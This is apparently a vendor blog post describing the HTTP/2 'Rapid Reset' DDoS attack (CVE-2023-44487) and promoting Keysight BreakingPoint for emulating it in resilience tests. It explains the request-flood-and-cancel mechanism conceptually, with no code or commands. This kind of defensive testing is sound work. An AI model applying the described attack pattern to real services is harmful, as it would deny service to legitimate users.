In this two-part blog, we will explore the recent “Rapid Reset” distributed denial of service (DDoS) attack that generated a record setting 398 million requests per second at its peak.
In this first blog, we will review the fundamental components of this attack and the recent Keysight BreakingPoint update that empowers users to directly test their systems’ ability to mitigate this attack.
In part two, we will demonstrate how BreakingPoint, when coupled with Keysight’s hyperscale APS-100/400GE series appliances or our powerful CloudStorm load modules, can generate the Rapid Reset attack at scale, allowing users to recreate the record setting request rates generated in the wild by this potent DDoS attack.
On Oct 10, 2023, Cloudflare, Google, Amazon AWS, Microsoft and others released information about a DDoS attack called “Rapid Reset” (CVE-2023-44487) which set a dubious new record of generating nearly 398 million malicious requests per second, more 7.5 times the number seen in the previous, record-breaking attack.
DDoS attacks are cyber-attacks that flood a target system with traffic in an effort to starve that system of resources. In so doing, these attacks can deny those same resources to legitimate users, potentially induce system crashes, or simply act as a “smoke screen” to conceal additional attacks launched against the same target system.
The Rapid Rest DDoS attack leverages a feature of the HTTP/2 protocol that allows multiple HTTP streams to be sent simultaneously over a single TCP connection, an enhancement that improves performance over HTTP/1.1(which requires streams to be sent serially). Rapid Reset exploits this HTTP/2 feature, distorting it into a zero-day vulnerability.
First the malicious client floods the target system with multiple, simultaneous HTTP/2 request streams. The client then immediately cancels these requests and sends a fresh batch of requests, repeating this process over and over. Meanwhile, the target system expends resources attempting to initially process each set of HTTP requests, before it receives notification that the requests have been canceled. By rapidly repeating this process over and over, the malicious client can overwhelm the target system as it tries to handle this flood of requests and resets.
While Cloudflare, Google, Amazon AWS, Microsoft and others have released updates and guidance to help mitigate the effects of this attack, it is critical that users test their own mitigation systems to ensure their infrastructure and services are in fact protected against this vulnerability.
This is where Keysight’s BreakingPoint application and security test tool can help.
BreakingPoint’s Application and Threat Intelligence (ATI) team works around the clock to provide up-to-date applications and security content, empowering users to test their systems’ ability to handle the newest applications and withstand the latest attacks. Within 8 days of the vulnerability being publicly disclosed, Keysight released an ATI update that allows users to quickly and easily emulate the Rapid Reset DDoS attack to test the resilience of their systems and services in the face of this threat.
What follows is a brief description of these testing capabilities.
In this example, we run the test in “two-arm” mode, where BreakingPoint emulates both the test clients and servers, with the device under test (DUT) passing traffic between the two. However, you can also run the test in “one-arm” mode and send test traffic directly to your own server or service.
The first step is to download the latest ATI update to ensure the latest content, including the Rapid Reset DDoS attack, is available in the BreakingPoint test tool.
Next, we create two Application Simulator components in BreakingPoint, one component called “Legitimate Enterprise Datacenter” that sends legitimate traffic found in Enterprise Datacenter (including SMTP, DNS, FTP, HTTP, etc) and one component called “DDoS Attack Traffic” that sends the Rapid Rest DDoS attack traffic.
We start the test by sending only the legitimate, “Keysight Enterprise Datacenter” traffic, to establish the baseline load on the DUT. From the BreakingPoint real-time results view, we can see the legitimate traffic successfully flowing through the DUT, and we can see that the DUT’s CPU usage is low.
We then add in the malicious, Rapid Reset DDoS attack traffic, allowing us to see the impact of the malicious traffic on the DUT. We quickly see the DUT’s CPU usage spike to 99% and BreakingPoint starts reporting errors as the legitimate “Keysight Enterprise Datacenter” traffic begins timing out because the DUT is overwhelmed with malicious traffic and can no longer successfully process the legitimate traffic.
We then ramp down the malicious traffic, leaving only the legitimate, “Keysight Enterprise Datacenter” traffic flowing for the remainder of the test, allowing us to see the DUT recover as the attack traffic ramps down.
Once the test is complete, we can then view the detailed results report to see the impacts of the DDoS attack on key performance indicators like throughput, connection rate and more.
Stay tuned for part 2 of this blog, “Harnessing Unparalleled Scalability: Recreating 398 Million RPS with Keysight BreakingPoint” in which we will demonstrate how you can use either Keysight’s scalable APS-100/400GE series appliances or our powerful CloudStorm load modules to emulate the Rapid Reset DDoS attack at hyperscale.
By harnessing the power of just three APS-ONE-100 appliances or three CloudStorm load modules, organizations can emulate this staggering attack volume with exceptional precision. The APS-ONE-100 appliance and the CloudStorm load modules both offer a level of scalability and versatility that sets a new industry standard. These hardware solutions not only empower users to test their systems’ ability to withstand such attacks but also demonstrate Keysight’s commitment to staying at the forefront of DDoS mitigation technology, helping organizations ensure they are fortified against even the most formidable DDoS threats.
Learn more about the APS-100/400GE series appliances, CloudStorm load modules and BreakingPoint application and security test tool.
For more information on mitigating DDoS attacks, including the Rapid Reset attack, please visit: